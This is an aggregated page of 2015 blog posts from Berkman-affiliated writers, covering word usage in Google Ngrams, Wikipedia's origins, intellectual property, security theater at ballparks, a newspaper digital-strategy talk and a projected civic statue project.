Josephine is a PhD candidate in the Engineering Systems Division at MIT studying cybersecurity and Internet policy. Her dissertation research focuses on understanding combinations of different types of defenses for computer systems, including the interactions among technical, social, and policy mechanisms. She has interned with Microsoft's Technology Policy Group, the Center for Democracy & Technology, the White House Office of Science and Technology Policy, and the Department of Defense. She has also written on computer security topics for Slate, Scientific American, and Newsweek. She holds an AB in mathematics from Princeton University, and an SM in Technology & Policy from MIT.

by candersen at April 21, 2015 01:05 PM

April 19, 2015

David Weinberger
When Mom beat Ma

I have a friend who wonders when “mom” turned into a plain old noun instead of a name, as in “My mom drinks coffee” vs. “Hey, Mom, would you like some coffee?” I can’t remember a time in my life when “mom” wasn’t a noun, so I checked at the Google Ngram Viewer, which lets you chart the use of words throughout Google Books’ entire corpus of tens of millions of books. Here’s the result:

So, it looks like the two track each other pretty well, at least in books.

The Ngram does show a serious uptick for both in the early 1940s. But before you go hypothesizing that during WWII we started writing about our mothers more, here’s the Ngram for Mother and mother:

The Mom/mom upturn was really just a blip when compared to the mammoth of Mother/mother. So, I dunno. (But we can conclude that Mother is the mother of all moms.)

I tried the same search, but for “Ma” and “ma”:

Ma and ma again seem to be in sync. But for some reason in 1986, for the first time Mom beat Ma.

Fascinating? You tell me.

The post When Mom beat Ma appeared first on Joho the Blog.

by davidw at April 19, 2015 05:24 PM

April 18, 2015

Joseph Reagle
Accident, luck, contingency, and meaning

In the conclusion to Mako Hill's article "Almost Wikipedia," he takes issue with my characterization of Wikipedia's success as luck. (To be clear, I say Wikipedia "can be seen as a happy accident.") In looking at Wikipedia relative to seven other online collaborative encyclopedia projects -- including ones I haven't included in my own histories -- Hill offers three propositions. Wikipedia succeeded because potential contributors were familiar with the encyclopedic genre, there were low barriers to contribution, and participants were collaborative rather than proprietary about their contributions.

My characterization of Wikipedia as a "happy accident" is not to say that reasons for its success cannot be discerned -- especially after the fact. Indeed, Good Faith Collaboration is my own attempt to explain its success. Hill's propositions are also compelling. However, in saying Wikipedia is an accident I am arguing that the reasons for Wikipedia's success were not fully appreciated at its start. In the introduction to my piece I explain that "I sometimes offer this (admittedly) exaggerated claim in response to those who confuse Wikipedia's current success with its uncertain origins."

At the start, it was but the most recent contender in an age-old pursuit of a universal encyclopedia: a dream that the latest technology would provide universal access to world knowledge. Jimmy Wales's and Larry Sanger's first attempt at what would eventually become Wikipedia, the wiki-based encyclopedia that "anyone can edit," was neither of these things. So, by saying that Wikipedia was an accident, I don't mean it was unwelcome--far from it--but that it was a fortuitous turn of events unforeseen by even its founders. Moreover, it was evidence of contingency's role in technological innovation.

As I continue to think about the history and meaning of technology, my appreciation for contingency has only strengthened. In Nick Bilton's Hatching Twitter: A True Story of Money, Power, Friendship, and Betrayal, I was fascinated by the competing visions of its cofounders. (Also see "All Is Fair in Love and Twitter".) Bilton wrote that Williams's and Stone's experiences with blogging led them to see Twitter as a platform for real-time news events. Glass is characterized as someone looking for a way to connect with others. Dorsey's vision is said to be influenced by the dispatch systems he wrote for bike messengers. There was a period when people argued Wikipedia was not an encyclopedia (and that it would flop), but that time has passed: it is the only encyclopedia most of my students have ever known. Twitter too has succeeded -- in terms of adoption; sustainable profits are yet to be seen. But this doesn't mean its originators knew at the outset in what ways, and why, it would succeed. Indeed, we are still arguing about what Twitter is, and this then mirrors its uncertain origins.

by Joseph Reagle at April 18, 2015 04:00 AM

April 17, 2015

Bruce Schneier
Friday Squid Blogging: Squid Hoodie

This is neat.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

by Bruce Schneier at April 17, 2015 09:31 PM

The No-Fly List and Due Process

The Congressional Research Service has released a report on the no-fly list and current litigation that it violates due process.

by Bruce Schneier at April 17, 2015 11:54 AM

Joseph Reagle
IPR and Taylor Swift

A quick recap on United States intellectual property for my students.

Copyrights and patents are monopolies granted in law to creators so as to encourage the creation of ideas and expression. Trademarks protect a "sign" (e.g., a logo or terms) associated with products or services. You can assign, transfer, or license all of these rights to others.


Patents protect ideas/inventions and limit others' abilities to make, use, and sell things that depend on those inventions. You have to register a patent and it lasts twenty years, after which everyone can use it.

I don't think Taylor Swift has any patents -- unless she's invented something!


Copyright protects expression (or "work") and limits others' abilities to make copies, create derivatives, and perform or publicly display works. It originally lasted 14 years, renewable to a total of 28 years, and then would revert to the public domain for everyone's benefit. Over the years, it's been extended and now is life of the author plus 70 years. Some rightfully ask how such a long term encourages creation. It doesn't, but companies like Disney don't want to give their copyrights up. You have a copyright in a work of expression as soon as you make it, and you can register it so you have a stronger case in court. Free culture (like Wikipedia) and Creative Commons licenses make it easy again to create things that other people can use relatively freely.

Because Taylor Swift writes (or co-writes) most of her songs, she has the copyright in the music and lyrics; Swift also has the copyright in her actual performances (e.g., recordings or videos of a concert).


A trademark is a recognizable sign associated with a product or service -- you can think of the "brand." You can make a "common law" claim (TM) or register it (R); a registered mark makes a stronger case in court. These can last indefinitely, but marks can become "generic" should they not be strictly limited to products and services from the claimant.

Swift, like a number of other big artists, has filed for trademarks on fragments from her songs. This would limit others' ability to use those lyrics in association with a product or service. Hence, no one but Swift could sell "this sick beat" brand t-shirts or hats. But she doesn't have a copyright on that expression (too small; not sufficiently original), so you could still use that phrase in speech or writing. Of course, just because she filed for the marks doesn't mean they'll be approved; and even if they are, it doesn't mean they'd stand up in court. Trademarks based on her name would be much stronger than any of these phrases.

by Joseph Reagle at April 17, 2015 04:00 AM

April 16, 2015

David Weinberger
Hillary in the uncanny valley

As a strategist for nine successful presidential campaigns and a selectman’s race in an Indianapolis (not the Indianapolis), I’d like to offer Hillary Clinton some free advice:

Get yourself out of the uncanny valley. When you try to be sincere and folksy you get just close enough that it’s a bit uncomfortable to watch.

Say what you will about Clinton’s campaign announcement, you have to admit that the tiny vignettes were effective.

Did you doubt that they were real people? Nope. Were they charming? Yup. Would you like to see more of them, including giving the fish kid his own sitcom where he teaches life lessons to the gay engaged couple and to the woman who’s about to retire? I’m already setting my Tivo!

What was the one moment of ickiness? Clinton bringing the whole scene to a screeching halt with her announcement “I’m getting ready to do something too.” The delivery was poor and the idea itself clanged against the first minute and a half of the video: ordinary folks talk about what they’re doing, and Hillary Clinton equates that with running for president. “We’re not so different, you and I: we both do things.”

Unfortunately, these issues of personality and performance count far more than they should. So, if we want Hillary Clinton to be president (and I do), then she needs to not be “warm and approachable.” When she tries, it just doesn’t work for her.

Ms. Clinton, I have no doubt that you are a delightful person when out of the public eye. But after more than twenty years of experience, we ought to conclude that in the public eye you’re socially awkward. Fine! Lots of us are. (You know someone who’s not? Your husband. Try to avoid standing next to him.)

So, how about if you embrace that awkwardness? Let it work for you. Be a bit shy. Bumble visibly. Get angry at heartless questions, like ones that act as if you were somehow personally responsible for the murder of your friend, Ambassador Chris Stevens. When not giving a speech, stop giving the internalized version of that speech; talking points are for See ‘n’ Say toys.

But recognize that when you do speak from the heart in public, it’s still always going to sound stilted and a bit uncomfortable. Acknowledge that. Make a joke. If you can’t be comfortable with yourself, at least be comfortable with that lack of comfort. You’re super-competent and will be the best-prepared president in decades, so it’s ok for you to have a personality flaw.

Because that’s what you really have in common with the rest of us.

The post Hillary in the uncanny valley appeared first on Joho the Blog.

by davidw at April 16, 2015 06:59 PM

April 15, 2015

Cyberlaw Clinic - blog
Berkman Center and Cyberlaw Clinic to Support MIT Media Lab’s Digital Currency Initiative

We at the Berkman Center for Internet & Society — and, in particular, here at the Cyberlaw Clinic — are thrilled to share today’s announcement from our friends and frequent collaborators at the MIT Media Lab of the Lab’s new Digital Currency Initiative. MIT has been a leader on both the study and implementation of bitcoin-based systems, with the MIT Bitcoin Club bringing students and others together to think about the development of bitcoin-related platforms and the MIT Bitcoin Project putting virtual currency in the virtual hands of students in an effort to generate interest in emerging payment systems. We are ecstatic to see the Media Lab put its weight behind research on and facilitation of blockchain-based technologies and welcome the effort to formalize its role as a neutral hub and convening force on the topic of digital currency.

The promise of bitcoin rests on its ability to facilitate secure and private financial transactions, and such privacy and security — in turn — rest upon the transparency and decentralized nature of the blockchain. As Brian Forde, Director of Digital Currency at the Media Lab, noted in today’s announcement, the successful implementation of public ledgers could have ramifications far beyond payments and payment systems:

This new system lets people transfer money without a bank. Write simple, enforceable contracts without a lawyer. Or, turn physical items like real estate or tickets to the ball game or concert into digital assets that can be sold with low to no transaction fees. Many are projecting that the impact will be similar to that of the Internet–disrupting traditional industries, challenging existing regulations, and significantly increasing the volume of commerce by dramatically lowering the cost to transact and establishing trust between two previously unknown parties.

The breadth of what is possible here is extraordinary and will impact the work of many in far-flung corners of the Media Lab and Berkman Center communities, well beyond those with a direct interest in cryptocurrencies.

MIT Media Lab Director Joi Ito notes in his blog post today that he intends for this effort to be “multinational and multistakeholder,” and he mentions the Berkman Center as one collaborator. The Center has long had an interest in this space with a particular focus on law, policy, and governance issues — from the pioneering work of members of the Berkman community like Primavera de Filippi (who has worked on distributed public ledgers in a variety of contexts) to the Clinic’s own work with the MIT Bitcoin Club (developing resources and supporting the identification and management of legal and regulatory concerns with the use of bitcoin). We welcome the opportunity to continue — and further intensify over the next academic year — these community-based efforts and support and complement the Media Lab in this important and timely work.

Bitcoin Image courtesy of Pixabay user Simon, CC0.

by Christopher Bavitz at April 15, 2015 07:24 PM

Bruce Schneier
Metal Detectors at Sports Stadiums

Fans attending Major League Baseball games are being greeted in a new way this year: with metal detectors at the ballparks. Touted as a counterterrorism measure, they're nothing of the sort. They're pure security theater: They look good without doing anything to make us safer. We're stuck with them because of a combination of buck passing, CYA thinking, and fear.

As a security measure, the new devices are laughable. The ballpark metal detectors are much more lax than the ones at an airport checkpoint. They aren't very sensitive -- people with phones and keys in their pockets are sailing through -- and there are no X-ray machines. Bags get the same cursory search they've gotten for years. And fans wanting to avoid the detectors can opt for a "light pat-down search" instead.

There's no evidence that this new measure makes anyone safer. A halfway competent ticketholder would have no trouble sneaking a gun into the stadium. For that matter, a bomb exploded at a crowded checkpoint would be no less deadly than one exploded in the stands. These measures will, at best, be effective at stopping the random baseball fan who's carrying a gun or knife into the stadium. That may be a good idea, but unless there's been a recent spate of fan shootings and stabbings at baseball games -- and there hasn't -- this is a whole lot of time and money being spent to combat an imaginary threat.

But imaginary threats are the only ones baseball executives have to stop this season; there's been no specific terrorist threat or actual intelligence to be concerned about. MLB executives forced this change on ballparks based on unspecified discussions with the Department of Homeland Security after the Boston Marathon bombing in 2013. Because, you know, that was also a sporting event.

This system of vague consultations and equally vague threats ensures that no one organization can be seen as responsible for the change. MLB can claim that the league and teams "work closely" with DHS. DHS can claim that it was MLB's initiative. And both can safely relax because if something happens, at least they did something.

It's an attitude I've seen before: "Something must be done. This is something. Therefore, we must do it." Never mind if the something makes any sense or not.

In reality, this is CYA security, and it's pervasive in post-9/11 America. It no longer matters if a security measure makes sense, if it's cost-effective or if it mitigates any actual threats. All that matters is that you took the threat seriously, so if something happens you won't be blamed for inaction. It's security, all right -- security for the careers of those in charge.

I'm not saying that these officials care only about their jobs and not at all about preventing terrorism, only that their priorities are skewed. They imagine vague threats, and come up with correspondingly vague security measures intended to address them. They experience none of the costs. They're not the ones who have to deal with the long lines and confusion at the gates. They're not the ones who have to arrive early to avoid the messes the new policies have caused around the league. And if fans spend more money at the concession stands because they've arrived an hour early and have had the food and drinks they tried to bring along confiscated, so much the better, from the team owners' point of view.

I can hear the objections to this as I write. You don't know these measures won't be effective! What if something happens? Don't we have to do everything possible to protect ourselves against terrorism?

That's worst-case thinking, and it's dangerous. It leads to bad decisions, bad design and bad security. A better approach is to realistically assess the threats, judge security measures on their effectiveness and take their costs into account. And the result of that calm, rational look will be the realization that there will always be places where we pack ourselves densely together, and that we should spend less time trying to secure those places and more time finding terrorist plots before they can be carried out.

So far, fans have been exasperated but mostly accepting of these new security measures. And this is precisely the problem -- most of us don't care all that much. Our options are to put up with these measures, or stay home. Going to a baseball game is not a political act, and metal detectors aren't worth a boycott. But there's an undercurrent of fear as well. If it's in the name of security, we'll accept it. As long as our leaders are scared of the terrorists, they're going to continue the security theater. And we're similarly going to accept whatever measures are forced upon us in the name of security. We're going to accept the National Security Agency's surveillance of every American, airport security procedures that make no sense and metal detectors at baseball and football stadiums. We're going to continue to waste money overreacting to irrational fears.

We no longer need the terrorists. We're now so good at terrorizing ourselves.

This essay previously appeared in the Washington Post.

by Bruce Schneier at April 15, 2015 11:58 AM

April 14, 2015

Justin Reich
A New Preface for the Ed Tech Developer's Guide
A new preface for the Ed Tech Developer's Guide, which was recently published by the U.S. Department of Education.

by Justin Reich at April 14, 2015 06:31 PM

David Weinberger
[shorenstein] Managing digital disruption in the newsroom

David Skok [twitter:dskok] is giving a Shorenstein Center lunchtime talk on managing digital disruption in the newsroom. He was the digital advisor to the editor of the Boston Globe. Today he was announced as the new managing editor of digital at the Globe. [Congrats!]

NOTE: Live-blogging. Getting things wrong. Missing points. Omitting key information. Introducing artificial choppiness. Over-emphasizing small matters. Paraphrasing badly. Not running a spellpchecker. Mangling other people’s ideas and words. You are warned, people.

As a Nieman fellow David audited a class at the Harvard Business School taught by Clay Christensen, of “creative destruction” fame. This gave him the sense that whether or not newspapers will survive, journalism will. Companies can be disrupted, but for journalism it means that for every legacy publisher that’s disrupted, there are new entrants that enter at the low end and move up market. E.g., Toyota started off at the low end and ended up making Lexuses. David wrote an article with Christensen [this one?] that said that you may start with aggregation and cute kittens, but as you move up market you need higher quality journalism that brings in higher-value advertising. “So I came out of the project doubly motivated as a journalist,” but also wanting to hold off the narrative that there is an inevitability to the demise of newspapers.

He helped start it and got recruited for the Globe. There he held to the RPP model: the Resources, Process, and Priorities you put in place to help frame an organizational culture. It’s important for legacy publishers to see that it isn’t just tech that’s bringing down newspapers; the culture and foundational structure of those organizations are also to blame.

If you take away the Internet, a traditional news organization is a print factory line. The Internet tasks were typically taken up by the equivalent groups within the org. Ultimately, the publisher’s job is how to generate profit, so s/he picks the paths that lead most directly to short-term returns. But that means user experience gets shuffled down, as does the ability of the creators to do “frictionless journalism.” On the Internet, I can write the best lead but if you can’t read it on your phone in 0.1 seconds, it doesn’t exist. The human experience has to be the most important thing. The consumer is the most important person in this whole transaction. How are we making sure that person is pleased?

In the past 18 months David has done a restructuring of the Globe online. He’s been the general mgr of Every Monday he meets with all the group leads, including the sales team (which he does not manage for ethical journalism reasons). This lets them set priorities not at the publisher level where they are driven by profit, but by user and producer experience. The conceit is that if they produce good user and producer experiences, the journalism will be better, and that will ultimately drive more revenue in advertising and subscriptions.

The Globe had a free site and a paywall site. This was set up before his time. The free site, relative to its size as a website business, has a remarkable amount of revenue via advertising. The paywall site is a really healthy digital subscription business. It has more subscriptions in North America outside of the NYT and WSJ. These are separate businesses that had been smushed together. So David split them up.


They’ve done a lot to change their newsroom processes. Engineers are now in the newsroom. They use agile processes. The newsroom is moving toward an 18-24 hour cycle as opposed to the print cycle.

We do three types of journalism on our sites:

1. Digital first — the “bloggy stuff.” How do we add something new to those conversations that provides the Globe’s unique perspective? We don’t want to be writing about things simply because everyone else is. We want to bring something new to it. We have three digital first writers.

2. The news of the day. We do a good job with this, as demonstrated during the Marathon bombing.

3. Enterprise stuff — long investigations, etc. Those stories get incredible engagement. “It’s heartening.” They’re experimenting with release schedules: how do you maximize the exposure of a piece?

In terms of resources: We’re looking at our content management system (CMS). Ezra Klein went to Vox in part because of their CMS. You need a CMS that gives reporters what they need and want. We also need better realtime analytics.

Priorities, Processes + Resources = organizational culture.

Q: You’re optimistic…?

A: We’re now entering the third generation of journalism on line. First: [missed it]. Second: SEO. Third: the social phase, the network effect. How are we engaging our readers so that they feel responsible to help us succeed? We’re not in the business of selling impressions [=page views, etc.] but experiences. E.g., we have a bracket competition (“Munch Madness“) for restaurant reviews. We tell advertisers that you’re getting not just views but experiences.

Q: [alex jones] And these revenues are enough to enable the Globe to continue…?

A: It would be foolish of me to say yes, but …

Q: [alex jones] How does the Globe attract an audience that’s excited but civil?

A: Part of it is thinking about new ways of doing journalism. E.g., for the Tsarnaev trial, we created cards that appear on every page that give you a synopsis of the day’s news and all the witnesses and evidence online. We made those cards available to any publisher who wanted them. They’re embeddable. “We reached out to every publisher in New England that can’t cover it in the depth that the Globe can” and offered it to them for free. “We didn’t get as much uptake as we’d like,” perhaps because the competitive juices are still flowing.

Then there are the comments. When news orgs first put comments on their site, they thought about them as digital letters to the editor. Comments serve another purpose: they are a product and platform in and of themselves where your community can talk about your product. They’re not really tied to the article. Some comments “make me weep because they’re so beautiful.”

Q: As journalists are being asked to do much more, what do you think about the pay scale declining?

A: I can’t speak for the industry. The Globe pays competitively. We’re creating jobs now. And there are so many more outlets out there that didn’t exist five years ago. Journalists today aren’t just writers. They’re sw engineers, designers, etc.

I’m increasingly concerned about the lack of women engineers entering the field. Newspapers have as much responsibility as any other industry to address this issue.

Q: How to monetize aggregators?

A: If we were to try to go to every org that aggregates us, it’d be a fulltime job. We released a story online on a Feb. afternoon about Jeb Bush at Andover. [This one?] By Friday night, it was all over. I don’t view it as a threat. We have a meter. My job is to make sure that our reporting is good enough that you’ll use your credit card and sign up. I’m in awe of the number of people who sign up every day. We have churn issues as does everyone, but the meter business has been a success.

Q: [me] As you redo your CMS, have you thought about putting in an API? If so, would you consider opening it to the public?

A: When I’ve opened up API sets, there has been minimal takeup.

Q: What other newspapers are doing a good job addressing digital issues? And does the ownership structure matter?

A: The Washington Post, and they have a very similar ownership structure as the Globe.

Q: [alex] What’s Bezos’s effect on the WaPo?

A: Having the Post appear on every Kindle is something we’d all like for ourselves.

Q: Release schedule?

A: Our newsroom’s phenomenal editors are recognizing and believing that we are not a platform-specific business. We find only one in four of our print subscribers logged on to the web site with any frequency. We have two different audiences. We’ve had no evidence that releasing stories earlier on digital cannibalizes our print business. I love print. But when I get the Sunday edition, I feel guilty if I recycle it before I’ve read it all. So why not give people the opportunity to read it when they want? If it’s ready on a Wed., let them read it on Wed. Different platforms have different reader habits.

Q: What’s native to the print version?

A: Some of the enterprise reporting perhaps. But it’s more obvious in format issues. E.g., the print showed the 30 charges Tsarnaev was charged with. It had an emotional impact that digital did not.

Q: Is your print audience entirely over the age of 50?

A: No. It’s a little older than our overall numbers, but not that much.

Q: What are you doing to reduce the churn rate? What’s worked on getting print and digital folks to understand each other?

A: I’m a firm believer in data. We’re not pushing for digital change because we want to but because data backs up our claims. About frictionlessness: It’s so easy to buy goods. Uber. Even buying a necklace. We’re working with a backend database that is complex. We have to tie that into our digital product. The front end complexities on how users can pay come from the complexity of the back end.

Q: [nick sinai] I appreciate your comments about bringing designers, developers, UX into the newsroom. That’s what we’re trying to do in the govt. for digital services. How about data journalism?

A: Data journalism lets you tell stories you didn’t know were there. My one issue: We’ve reached a barrier: we’re reliant on what datasets are available.

Q: How many reporters work for print,, and

A: 250 journalists or so work for the Globe and they all work for all platforms.

Q: Are different devices attracting different stories? E.g., a long enterprise story may do better on particular devices. Where is contradiction, nuance, subtlety in this environment? How much is constrained by the device?

A: Yes, there are form-specific things. But there are also social-specific things. If you’re coming from Reddit, your behavior is different from your behavior coming from Facebook, etc. Each provides its own unique expectation of the reader. We’re trying to figure out how to be smarter in detecting where you’re coming from and what assets we should serve up to you. E.g., if you’re coming from Reddit and are going back to talk about the article, maybe you’re never going to subscribe, but could we provide a FB Like button, etc.?

Q: Analytics?

A: The most important metric for me is journalistic impact. That’s hard to measure. Sheer number? The three legislators who can change a law? More broadly: At the top of the funnel, it’s how to grow our audience: page views, shares, unique visitors, etc. As you get deeper into the funnel it’s about how much you engage with the site: bounce rate, path, page views per visit, time spent, etc. Third metric: return frequency. If you had a really good experience, did you come back: return visits, subscribers, etc.

[Really informative talk.]

The post [shorenstein] Managing digital disruption in the newsroom appeared first on Joho the Blog.

by davidw at April 14, 2015 05:39 PM

Ethan Zuckerman
The Civic Statuary Project

The University of Cape Town removed a controversial statue of British colonialist Cecil Rhodes last week, after a month of student protests. Rhodes, who built the De Beers diamond empire, was an unrepentant imperialist whose wealth came from purchasing mineral rights from indigenous leaders and turning their territories into British protectorates. Under his rule in Cape Colony, many Africans lost the right to vote, a step which some scholars see as leading to enforced racial segregation in South Africa. While Rhodes made major donations to charitable causes – including the land the University of Cape Town sits on – his legacy is a challenging and difficult one for many South Africans.

A month ago, student activist Chumani Maxwele emptied a bucket of excrement on the Rhodes statue on the UCT campus. Subsequent protests against the statue included wrapping it in black plastic, smearing it with paint and covering it with graffiti. When the statue was pulled down, protesters beat it with belts and chains as it was hauled away.


Protests against the Rhodes statue received widespread support online, spawning the hashtag #RhodesMustFall, and inspiring other attacks on statues throughout South Africa. Statues of Queen Victoria and George V have been splashed with paint in Port Elizabeth and Durban. Statues of Afrikaner leaders and Boer War generals have been targeted as well. The attack that’s received the most international attention was a defacement of a statue of Mahatma Gandhi in Johannesburg, part of a protest that argued that the revered activist had worked with the British colonial government in South Africa to promote segregation.

Statues are one of the oldest forms of figurative art, dating back at least to 40,000 BCE with the Lion man of the Hohlenstein Stadel. In ancient Egypt, Pharaohs were memorialized with Sphinxes, massive limestone statues that dominated the landscape – we might think of these as the first civic sculptures, public art designed to honor religious and political leaders. Fifteen hundred years later, Greek sculptors – who had previously portrayed mythological figures – began honoring political leaders in bronze and marble.

Statues erected for civic reasons are also torn down for civic reasons. Seven days after the Declaration of Independence was signed, General Washington’s troops tore down a statue of King George III that had been erected in 1770 in Bowling Green, a small greenspace at the southern tip of Manhattan Island. The decision to tear the statue down was practical as well as symbolic – the two tons of lead in the statue were turned into 42,000 musket balls for the use of revolutionary soldiers. Statues of leaders who’ve been ousted are often torn down, sometimes spontaneously, sometimes with the help of conquering armies.

Statue of Saddam Hussein in Firdos Square, Baghdad, torn down by the US marines.

It’s not only political leaders whose statues fall. In the wake of revelations about widespread sexual abuse by Penn State football coaches, a statue of Joe Paterno was removed by the university. The decision to remove the Paterno statue has been controversial, and a crowdfunding campaign has raised funds for a new Paterno statue in downtown State College, Pennsylvania, two miles from the university campus.

While statues are one of the oldest forms of civic artwork and technology (their only rival for age is the cave painting), they still gain attention when people erect them today… especially when they are erected without permission. On April 6th, a small group of artists placed a bronze-colored bust of NSA whistleblower Edward Snowden atop a pedestal in Prison Ship Martyrs Monument in Fort Greene Park, Brooklyn. By mid-afternoon, the bust had been covered with tarpaulins, and later that day, it was removed entirely. The bust took over six months to construct, and cost tens of thousands of dollars to design and deploy.


Frustrated by the brief lifespan of the Snowden statue, The Illuminator Art Collective – a group of artists not related to the original sculptors – projected a hologram-like image of Snowden on a cloud of smoke behind the pillar. The Snowden projection is part of a tradition of artistic intervention that has used projection to create provocative art in public spaces. Polish-American artist Krzysztof Wodiczko has used projections to bring statues “to life”, turning static war memorials into active spaces for the discussion of war and peace.

(Projection is a powerful tactic for civic activism – see Hologramas Por La Libertad, which is using projections of street protests against the side of the Spanish parliament to make a point about new laws that strongly restrict public protest. But this is a story about statues, not projections, so we’ll honor the effort and move on.)

A few days before the Snowden statue and projection, we found ourselves discussing civic statues in our lab, the Center for Civic Media. The issue came up not because we were having a deep discussion about the nature of statuary, but because we moved a worktable, revealing an open area that the students and I thought might be perfect for a statue. We began talking about the idea of a statue that could be rapidly deployed, which could change to honor different people at different times, and which would inspire discussion about why someone was being honored as a civic hero.

We built a prototype civic statue using an old projector and a sheet of optical rear projection acrylite. (The Media Lab is the sort of place where sheets of acrylite are just kicking around and folks like Dan Novy are generous enough to lend them out.) For our demo, I decided we would honor Professor Attahiru Jega, chairman of Nigeria’s election commission, which had just conducted a presidential election widely regarded as free and fair in which the incumbent president was defeated. Nigerians on all sides of the political spectrum honored Jega’s role in administering a fair election, and “Jega” began to emerge as slang for being chill, calm and avoiding conflict: “20 people showed up for dinner at his house unexpectedly, but he was totally Jega about it and sent out for chicken.”

This week is the Media Lab member week, where sponsors come to visit our labs and see our projects. We decided to rapidly prototype the statue so we could show it off, with some simple design constraints:

– It should be quickly deployable, easy to set up and move
– It should be relatively inexpensive (our target is a standalone programmable statue that costs under $500)
– It shouldn’t require a specialized photo shoot – it should use available imagery
– It should prompt discussion within the group hosting the statue about who should be honored and how

As we thought about who to honor, I came across this tweet from my friend Liz Henry:

As it turns out, that brave and awesome man was Feidin Santana, a 23-year-old Dominican immigrant who heard Walter Scott being tased and captured footage of his shooting by police officer Michael Slager. As with Prof. Jega, we found an image online, masked it and added text to form a plaque. Savannah Niles, who is working on a project to build smoothly looping animated GIFs that she calls Glyphs, went a step further and built a statue of Santana that moves, subtly.


Niles explains what a Glyph is, showing the statue of Feidin Santana

Our prototype raises as many questions as it answers. Some are practical: Should this be a single unit, perhaps using a mirror to bounce the projection onto the screen? Will this work only in dim, interior spaces? Others focus on the community aspects: How do we decide who to honor? We held a brief email exchange about who we might feature, and quickly realized that there’s a real problem when people disagree about who should be honored. We’re working on a system that will allow people to propose candidates and select people to be honored by acclaim, rather than by fiat, which is how we selected Prof. Jega, Feidin Santana and feminist scholar and activist Anita Sarkeesian as our first three honorees.

As we work on this project in the long term, I’m interested in taking on a richer and deeper set of questions: What are statues for in a digital age? Is the rapid deployment and impermanence of these statues a feature or a bug? Can new types of statues help challenge long-standing gender and racial disparities in who we honor?

The civic statuary project is an experiment, and we may or may not continue it beyond showcasing it at this members’ meeting. But this question of how societies honor their civic heroes is a rich one, and I hope this experiment – and this blog post – opens conversations about who and how we memorialize.

by Ethan at April 14, 2015 05:28 PM

Feeds In This Planet